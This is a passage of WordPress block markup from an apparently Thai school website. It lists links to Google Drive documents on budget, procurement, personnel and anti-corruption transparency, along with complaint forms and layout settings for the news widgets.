data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1whIeTfY6kQosZ-McO5fR8M2eQCwpxNnI/view?usp=drive_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1DstLLhCLdPqU3gL1bu5p0UByVlg4Yt9t/view?usp=drive_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br><a href=\"https://drive.google.com/file/d/1d2db3xyqZbucO821fPXAU0frbQC9W5KA/view?usp=drive_link\" data-type=\"page\" data-id=\"2\"> - คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1QhT6YZ7u_mYXsy_mZUDQXHL1Yx0XHO7B/view?usp=drive_link\">  - คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1woP9ChkM3zQI8gthAIPX43-z4ymQZZLk/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1JpT_5pzV7hlbP1epiDCWYSAQG-UOkUeD/view?usp=drive_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1YhuyYvmrvtvgv6jkYfYHMulIorbiuLIA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/18y88RapyKtpYZaogaASQKJRo0_aXRsbi/view?usp=share_link\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/16p7JP94yt1fzyAiaRNuuxqppMr-Z_s87/view?usp=share_link\">รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1Nf4XWZmTyc4NdsmEJfShsVdo2WXGwzgr/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NEYcpYMKhZ8r6tEVPscCjn9illJwN0w8/view?usp=share_link\">ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/19Mzx-IUTBkQj1tAebM57-8yAiovgLP2n/view?usp=share_link\">การขับเคลื่อนจริยธรรม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1fYwZNgW-VtyshJmctqYo_ZKlKE-M6JS1/view?usp=drive_link\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://forms.gle/KBRUecqKvRqxgrPm7\" data-type=\"link\" data-id=\"https://forms.gle/KBRUecqKvRqxgrPm7\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1mvYvdhMLSABxaSKEGWClts0-nIUc7pwg/view?usp=sharing\">ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและปรพฤติมิชอบ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sEnWAaXCQZ5zH9fciWyPRwRvdXA95k8x/view?usp=share_link\">การเปิดโอกาสให้เกิดการมีส่วนร่วม</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10Sl2uV0MH7K-Cnm_cbftOiRWMmdulXqc/view?usp=share_link\">ป</a><a href=\"http://watprato.ssk.in.th/?page_id=2\" data-type=\"page\" data-id=\"2\">ระกาศเจตนารมณ์นโยบาย No G</a><a href=\"https://drive.google.com/file/d/15xtXTS0J1eFadldJs36XtPWecBT7tkDc/view?usp=drive_link\" data-type=\"page\" data-id=\"2\">ift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WCZh2eU-3QNzEeCUNBD2FjlkORqZ7x1n/view?usp=share_link\">การสร้างวัฒนธรรม&nbsp; No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1icrf52k0yexL-UwEM4ahuLs3tm6Ql8_Q/view?usp=share_link\">รายงานผลตามนโยบาย No Gift Policy</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QpgojOLg93xMFq319R5HXVloKfolMM6v/view?usp=share_link\">รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1wNSqiMcHi_t5jB4xfBXvDdIG8ZIfSKHC/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/10vrLC6y6r5_UvjaVQt_BXXu3yUH_ls9i/view?usp=share_link\">แผนการปฏิบัติการป้องกันการทุจริต</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1sPS_Yg50vqXIEkS1xwD-f4nBGOjW_xW7/view?usp=share_link\">รายงานการดำเนินการป้องกันการทุจริตประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1l76kF-c6CryzCngVGqebClQpOMRnofY1/view?usp=share_link\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1LOn6Jw1hFEEY_ikE_hexCNtU50UrYTtq/view?usp=share_link\">รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_ecdd7d-71\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"